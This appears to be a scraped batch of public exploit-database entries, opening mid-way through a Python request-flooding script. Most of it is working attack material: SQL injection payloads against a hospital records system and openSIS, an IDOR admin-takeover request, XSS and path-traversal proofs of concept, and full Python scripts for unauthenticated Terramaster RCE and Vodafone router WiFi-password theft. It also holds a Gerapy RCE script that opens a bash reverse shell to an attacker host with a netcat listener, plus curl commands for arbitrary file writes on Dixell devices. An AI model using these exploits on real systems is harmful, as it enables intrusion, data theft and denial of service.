Usage: " + colors.YELLOW + "{} ".format(sys.argv[0]) + colors.RED + "<" + colors.BLUE + "URL" + colors.RED + "> <" + colors.BLUE + "THREADS" + colors.RED +">" + colors.END) sys.exit(1) url = sys.argv[1] Tr = sys.argv[2] def http(): counter = 0 p1 = log.progress(colors.TURQUOISE + "Requests" + colors.END) while True: r = requests.get(url) r = requests.get(url + "/mysqladmin") counter += 2 p1.status(colors.YELLOW + "({}) ({}/mysqladmin)".format(url, url) + colors.GRAY + " = " + colors.GREEN + "[{}]".format(counter) + colors.END) if exit: break if __name__ == '__main__': threads = [] try: for i in range(0, int(Tr)): t = threading.Thread(target=http) threads.append(t) sys.stderr = open("/dev/null", "w") for x in threads: x.start() for x in threads: x.join() except Exception as e: log.failure(str(e)) sys.exit(1)
-
Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated)
# Exploit Title: Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated) # Date: 30/12/2021 # Exploit Author: twseptian # Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hprms_0.zip # Version: v1.0 # Tested on: Kali Linux 2021.4 *SQL Injection* SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Hospital's Patient Records Management System v1.0 is vulnerable to SQL injection via the 'id' parameter on the patient list. *Attack Vector* An attacker can compromise the database of the application using automated (or manual) tools like SQLmap. *Steps to reproduce:* Step-1: On the dashboard navigate to 'Patient List', then go to the 'Action' > 'View Records' page using the following URL: http://localhost/hprms/admin/?page=patients/view_patient&id=1 Step-2: Put the SQL injection payload in the 'id' field. time-based blind payload : page=patients/view_patient&id=1' AND (SELECT 2664 FROM (SELECT(SLEEP(5)))ixec) AND 'XcAY'='XcAY Step-3: The target server accepted our payload and the response was delayed by 5 seconds.
-
BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
# Exploit Title: BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated) # Google Dork: intext:"BeyondTrust" "Redistribution Prohibited" # Date: 30/12/2021 # Exploit Author: Malcrove # Vendor Homepage: https://www.beyondtrust.com/ # Version: v6.0 and earlier versions Summary: An unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allows remote attackers to inject arbitrary web script or HTML. Remote attackers could achieve full admin access to the appliance by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint. Vulnerability Details: Affected Endpoint: /appliance/login Affected Parameter: login[password] Request Method: GET or POST Proof of concept (POC): By navigating to the link below in a modern web browser, the alert(document.domain) JavaScript call is executed in the context of the BeyondTrust Remote Support domain. http://<bomgar-host>/appliance/login?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password Mitigation: A fix has been released by the vendor in NSBase 6.1. It's recommended to update the vulnerable appliance base version to the latest version. - Time-Line: April 6, 2021: Vulnerability advisory sent to the vendor (Beyondtrust) April 8, 2021: Received an initial reply from the vendor Jun 10, 2021: The vendor released a fix for the vulnerability in NSbase 6.1 Dec 30, 2021: Responsible public disclosure - Credits Ahmed Aboul-Ela (Malcrove)
-
Hospitals Patient Records Management System 1.0 - Account TakeOver
# Exploit Title: Hospitals Patient Records Management System 1.0 - Account TakeOver # Date: 30/12/2021 # Exploit Author: twseptian # Vendor Homepage: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hprms_0.zip # Version: v1.0 # Tested on: Kali Linux 2021.4 *Insecure direct object references (IDOR)* Insecure Direct Object References (IDOR) occur when an application provides direct access to objects based on user-supplied input. Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, or files in the system. *Attack Vector* An attacker can take over the Administrator's account. *Steps to reproduce:* Note: in this case, we used two users, user1 as a staff member with user id '4', and admin as an Administrator with user id '1'. 
===================================================================================================================================== Step-1: Log in to the application using user1 account,then on the dashboard navigate to 'My Account' http://localhost/hprms/admin/?page=user ===================================================================================================================================== Step-2: Modify the username,lastname and password,then let's intercept the request using burpsuite: POST /hprms/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------17632878732301879013646251239 Content-Length: 806 Origin: http://localhost Connection: close Referer: http://localhost/hprms/admin/?page=user Cookie: PHPSESSID=32kl57ct3p8nsicsrp8dte2c50 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="id" 4 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="firstname" user1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="lastname" admin -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="username" admin1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="password" admin1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------17632878732301879013646251239-- ===================================================================================================================================== 
Step-3: Change parameter id '4' to id '1' POST /hprms/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------17632878732301879013646251239 Content-Length: 806 Origin: http://localhost Connection: close Referer: http://localhost/hprms/admin/?page=user Cookie: PHPSESSID=32kl57ct3p8nsicsrp8dte2c50 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="id" 1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="firstname" user1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="lastname" admin -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="username" admin1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="password" admin1 -----------------------------17632878732301879013646251239 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------17632878732301879013646251239-- ===================================================================================================================================== step-4: Click 'Forward' on burpsuite. Now user1 is a Administrator.
-
TRIGONE Remote System Monitor 3.61 - Unquoted Service Path
# Exploit Title: TRIGONE Remote System Monitor 3.61 - Unquoted Service Path # Discovery by: Yehia Elghaly # Date: 30-12-2021 # Vendor Homepage: https://www.trigonesoft.com/ # Software Link: https://www.trigonesoft.com/download/Remote_System_monitor_Server_3.61_x86_Setup.exe # Tested Version: 3.61 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 7 x86 - Windows Server 2016 x64 # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ TRIGONE Remote System Monitor Server RemoteSystemMonitorService C:\Program Files\TRIGONE\Remote System Monitor Server\RemoteSystemMonitorService.exe Auto C:\>sc qc srvInventoryWebServer [SC] QueryServiceConfig SUCCESS SERVICE_NAME: RemoteSystemMonitorService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\TRIGONE\Remote System Monitor Serv er\RemoteSystemMonitorService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : TRIGONE Remote System Monitor Server DEPENDENCIES : SERVICE_START_NAME : LocalSystem
-
Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Title: Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated) # Date: 12/24/2021 # Exploit Author: n0tme (thatsn0tmysite) # Full Write-Up: https://thatsn0tmy.site/posts/2021/12/how-to-summon-rces/ # Vendor Homepage: https://www.terra-master.com/ # Version: TOS 4.2.X (4.2.15-2107141517) # Tested on: 4.2.15, 4.2.10 #/bin/env python import urllib3 import requests import json import argparse import hashlib import time import os TARGET = None MAC_ADDRESS = None PWD = None TIMESTAMP = None def tos_encrypt_str(toencrypt): key = MAC_ADDRESS[6:] return hashlib.md5(f"{key}{toencrypt}".encode("utf8")).hexdigest() def user_session(session, username): session.cookies.clear() cookies = {"kod_name":username, "kod_token":tos_encrypt_str(PWD)} if username == "guest": cookies = {"kod_name":"guest", "kod_token":tos_encrypt_str("")} for name,value in cookies.items(): session.cookies[name] = value def download(session, path, save_as=None): user_session(session, "guest") r=session.post(f"{TARGET}/module/api.php?mobile/fileDownload", data={"path":path}) filename = os.path.basename(path) if save_as is not None: filename = save_as with open(filename, "wb") as file: file.write(r.content) def get_admin_users(session): download(session, "/etc/group", save_as="/tmp/terramaster_group") with open("/tmp/terramaster_group", "r") as groups: for line in groups: line = line.strip() fields = line.split(':') if fields[0] == "admin": users = fields[3].split(",") os.remove("/tmp/terramaster_group") return users if __name__ == '__main__': p = argparse.ArgumentParser() p.add_argument(dest="target", help="Target URL (e.g. 
http://10.0.0.100:8181)") p.add_argument("--cmd", dest="cmd", help="Command to run", default="id") p.add_argument("-d", "--download", dest="download", help="Only download file", default=None) p.add_argument("-o", "--output", dest="save_as", help="Save downloaded file as", default=None) p.add_argument("-c", "--create", dest="create", help="Only create admin user (format should be admin:password)", default=None) p.add_argument("--tor", dest="tor", default=False, action="store_true", help="Use TOR") p.add_argument("--rce", dest="rce", default=0, type=int, help="RCE to use (1 and 2 have no output)") args = p.parse_args() urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) TARGET = args.target s = requests.Session() if args.tor: s.proxies = {"http":"socks5://127.0.0.1:9050", "https": "socks5://127.0.0.1:9050"} s.headers.update({"user-device":"TNAS", "user-agent":"TNAS"}) r=s.post(f"{TARGET}/module/api.php?mobile/wapNasIPS") try: j = r.json() PWD = j["data"]["PWD"] MAC_ADDRESS = j["data"]["ADDR"] except KeyError: exit(1) TIMESTAMP = str(int(time.time())) s.headers.update({"signature": tos_encrypt_str(TIMESTAMP), "timestamp": TIMESTAMP}) s.headers.update({"authorization": PWD}) if args.download != None: download(s, args.download, save_as=args.save_as) exit(0) #RCEs RCEs=[f"{TARGET}/tos/index.php?app/del&id=0&name=;{args.cmd};xx%23", f"{TARGET}/tos/index.php?app/hand_app&name=;{args.cmd};xx.tpk", #BLIND f"{TARGET}/tos/index.php?app/app_start_stop&id=ups&start=0&name=donotcare.*.oexe;{args.cmd};xx"] #BLIND for admin in get_admin_users(s): user_session(s, admin) if args.create != None: user, password = args.create.split(":") groups = json.dumps(["allusers", "admin"]) r=s.post(f"{TARGET}/module/api.php?mobile/__construct") r=s.post(f"{TARGET}/module/api.php?mobile/set_user_information", data={"groups":groups, "username":user,"operation":"0","password":password,"capacity":""}) if "create user successful!" 
in str(r.content, "utf8"): print(r.content) break continue r = s.get(RCEs[args.rce]) content = str(r.content, "utf-8") if "<!--user login-->" not in content: print(content) exit(0)
-
Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection
# Exploit Title: Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection # Google Dork: Powered by Virtual Airlines Manager [v2.6.2] # Date: 2021-12-30 # Exploit Author: Milad Karimi # Vendor Homepage: http://virtualairlinesmanager.net # Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/ # Version: 2.6.2 # Tested on: Ubuntu 19.04 [1] Vulnerable GET parameter: notam_id=[SQLi] [PoC] http://localhost/vam/index.php?page=notam&notam_id=[SQLi] [2] Vulnerable GET parameter: airport=[SQLi] [PoC] http://localhost/vam/index.php?page=airport_info&airport=[SQLi] [3] Vulnerable GET parameter: registry_id=[SQLi] [PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi] [4] Vulnerable GET parameter: plane_location=[SQLi] [PoC] http://localhost/vam/index.php?page=fleet_public&plane_location=[SQLi] [5] Vulnerable GET parameter: hub_id=[SQLi] [PoC] http://localhost/vam/index.php?page=hub&hub_id=[SQLi] [6] Vulnerable GET parameter: pilot_id=[SQLi] [PoC] http://localhost/vam/index.php?page=pilot_details&pilot_id=[SQLi] [7] Vulnerable GET parameter: registry_id=[SQLi] [PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi] [8] Vulnerable GET parameter: event_id=[SQLi] [PoC] http://localhost/vam/index.php?page=event&event_id=[SQLi] [9] Vulnerable GET parameter: tour_id=[SQLi] [PoC] http://localhost/vam/index.php?page=tour_detail&tour_id=[SQLi]
-
Vodafone H-500-s 3.5.10 - WiFi Password Disclosure
# Exploit Title: Vodafone H-500-s 3.5.10 - WiFi Password Disclosure # Date: 01/01/2022 # Exploit Author: Daniel Monzón (stark0de) # Vendor Homepage: https://www.vodafone.es/ # Software Link: N/A # Version: Firmware version Vodafone-H-500-s-v3.5.10 # Hardware model: Sercomm VFH500 # The WiFi access point password gets disclosed just by performing a GET request with certain headers import requests import sys import json if len(sys.argv) != 2: print("Usage: python3 vodafone-pass-disclose.py http://IP") sys.exit() url = sys.argv[1]+"/data/activation.json" cookies = {"pageid": "129"} headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept- Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested- With": "XMLHttpRequest", "Connection": "close", "Referer":"http://192.168.0.1/activation.html?mode=basic&lang=en-es&step=129"} req=requests.get(url, headers=headers, cookies=cookies) result=json.loads(req.text)[3].get("wifi_password") print("[+] The wifi password is: "+result)
-
openSIS Student Information System 8.0 - 'multiple' SQL Injection
# Exploit Title: openSIS Student Information System 8.0 - 'multiple' SQL Injection # Date: 26/12/2021 # Exploit Author: securityforeveryone.com # Author Mail: hello[AT]securityforeveryone.com # Vendor Homepage: https://opensis.com # Software Link: https://opensis.com # Version: 8.0 Community Edition # Tested on: Linux/Windows # Researchers : Security For Everyone Team - https://securityforeveryone.com ''' DESCRIPTION A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v8.0 via the "student_id" and "TRANSFER[SCHOOL]" parameters in a POST request sent to /TransferredOutModal.php. The vulnerability is found in the "student_id" and "TRANSFER[SCHOOL]" parameters in a POST request sent to the page /TransferredOutModal.php. Example: POST /TransferredOutModal.php?modfunc=detail Post Data: student_id=1[SQL]&button=Save&TRANSFER[SCHOOL]=[SQL]&TRANSFER[Grade_Level]=5 If an attacker exploits this vulnerability, they may access private data in the database system. EXPLOITATION POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 Host: localhost User-Agent: user-agent Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: cookie Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 69 student_id=1[SQL]&button=Save&TRANSFER[SCHOOL]=[SQL]&TRANSFER[Grade_Level]=5 Example sqlmap Command: sqlmap.py -r request.txt --level 5 --risk 3 -p student_id --random-agent --dbs Example Payloads: Payload1: student_id=(SELECT (CASE WHEN (2108=2108) THEN 1 ELSE (SELECT 5728 UNION SELECT 5943) END))&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 Payload2: student_id=1 AND (SELECT 5604 FROM(SELECT COUNT(*),CONCAT(0x7162766a71,(SELECT (ELT(5604=5604,1))),0x717a6a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 Payload3: student_id=1 
AND (SELECT 6111 FROM (SELECT(SLEEP(5)))JtuC)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 ABOUT SECURITY FOR EVERYONE TEAM We are a team that has been working on cyber security in the industry for a long time. In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities. We have many free tools that you can use here: https://securityforeveryone.com/tools/free-security-tools '''
-
TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)
# Exploit Title: TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated) # Date: 03/01/2022 # Exploit Author: Fabiano Golluscio @ Swascan # Vendor Homepage: https://www.solari.it/it/ # Software Link: https://www.solari.it/it/solutions/other-solutions/access-control/ # Version: 3.24.0.2 # Fixed Version: 3.26.1.7 # Reference: https://www.swascan.com/solari-di-udine/ POC curl http://url:port/file?valore=../../../../WINDOWS/System32/drivers/etc/hosts
-
Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated) # Date: 03/01/2022 # Exploit Author: Jeremiasz Pluta # Vendor Homepage: https://github.com/Gerapy/Gerapy # Version: All versions of Gerapy prior to 0.9.8 # CVE: CVE-2021-43857 # Tested on: Gerapy 0.9.6 # Vulnerability: Gerapy prior to version 0.9.8 is vulnerable to remote code execution. This issue is patched in version 0.9.8. #!/usr/bin/python import sys import re import argparse import pyfiglet import requests import time import json import subprocess banner = pyfiglet.figlet_format("CVE-2021-43857") print(banner) print('Exploit for CVE-2021-43857') print('For: Gerapy < 0.9.8') login = "admin" #CHANGE ME IF NEEDED password = "admin" #CHANGE ME IF NEEDED class Exploit: def __init__(self, target_ip, target_port, localhost, localport): self.target_ip = target_ip self.target_port = target_port self.localhost = localhost self.localport = localport def exploitation(self): payload = """{"spider":"`/bin/bash -c 'bash -i >& /dev/tcp/""" + localhost + """/""" + localport + """ 0>&1'`"}""" #Login to the app (getting auth token) url = "http://" + target_ip + ":" + target_port r = requests.Session() print("[*] Resolving URL...") r1 = r.get(url) time.sleep(3) print("[*] Logging in to application...") r2 = r.post(url + "/api/user/auth", json={"username":login,"password":password}, allow_redirects=True) time.sleep(3) if (r2.status_code == 200): print('[*] Login successful! Proceeding...') else: print('[*] Something went wrong!') quit() #Create a header out of auth token (yep, it's bad as it looks) dict = json.loads(r2.text) temp_token = 'Token ' temp_token2 = json.dumps(dict['token']).strip('"') auth_token = {} auth_token['Authorization'] = temp_token + temp_token2 #Get the project list print("[*] Getting the project list") r3 = r.get(url + "/api/project/index", headers=auth_token, allow_redirects=True) time.sleep(3) if (r3.status_code != 200): print("[!] Something went wrong! 
Maybe the token is corrupted?") quit(); #Parse the project name for a request (yep, it's worse than earlier) dict = r3.text # [{'name': 'test'}] dict2 = json.dumps(dict) dict3 = json.loads(dict2) dict3 = json.loads(dict3) name = dict3[0]['name'] print("[*] Found project: " + name) #use the id to check the project print("[*] Getting the ID of the project to build the URL") r4 = r.get(url + "/api/project/" + name + "/build", headers=auth_token, allow_redirects=True) time.sleep(3) if (r4.status_code != 200): print("[*] Something went wrong! I can't reach the found project!") quit(); #format the json to dict dict = r4.text dict2 = json.dumps(dict) dict3 = json.loads(dict2) dict3 = json.loads(dict3) id = dict3['id'] print("[*] Found ID of the project: ", id) time.sleep(1) #netcat listener print("[*] Setting up a netcat listener") listener = subprocess.Popen(["nc", "-nvlp", self.localport]) time.sleep(3) #exec the payload print("[*] Executing reverse shell payload") print("[*] Watchout for shell! :)") r5 = r.post(url + "/api/project/" + str(id) + "/parse", data=payload, headers=auth_token, allow_redirects=True) listener.wait() if (r5.status_code == 200): print("[*] It worked!") listener.wait() else: print("[!] 
Something went wrong!") listener.terminate() def get_args(): parser = argparse.ArgumentParser(description='Gerapy < 0.9.8 - Remote Code Execution (RCE) (Authenticated)') parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP') parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port') parser.add_argument('-L', '--lh', dest="localhost", required=True, action='store', help='Listening IP') parser.add_argument('-P', '--lp', dest="localport", required=True, action='store', help='Listening port') args = parser.parse_args() return args args = get_args() target_ip = args.url target_port = args.target_port localhost = args.localhost localport = args.localport exp = Exploit(target_ip, target_port, localhost, localport) exp.exploitation()
-
Dixell XWEB 500 - Arbitrary File Write
# Exploit Title: Dixell XWEB-500 - Arbitrary File Write # Google Dork: inurl:"xweb500.cgi" # Date: 03/01/2022 # Exploit Author: Roberto Palamaro # Vendor Homepage: https://climate.emerson.com/it-it/shop/1/dixell-electronics-sku-xweb500-evo-it-it # Version: XWEB-500 # Tested on: Dixell XWEB-500 # References: https://www.swascan.com/vulnerability-report-emerson-dixell-xweb-500-multiple-vulnerabilities/ # Emerson Dixell XWEB-500 is affected by multiple arbitrary file write vulnerabilities # Endpoint: logo_extra_upload.cgi # Here the first line of the POC is the filename and the second one is the content of the file to be written # Write file echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/logo_extra_upload.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' # Verify curl -A Chrome -is "http://[target]:[port]/logo/" # Endpoint: lo_utils.cgi # Here ACTION=5 is to enable write mode echo -e "ACTION=5\nfile.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' # Verify using ACTION=3 to list resources echo -e "ACTION=3" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' # Endpoint: cal_save.cgi # Here the first line of the POC is the filename and the second one is the content of the file to be written echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/cal_save.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' # Verify curl -A Chrome -kis http://[target]:[port]/cgi-bin/cal_dir.cgi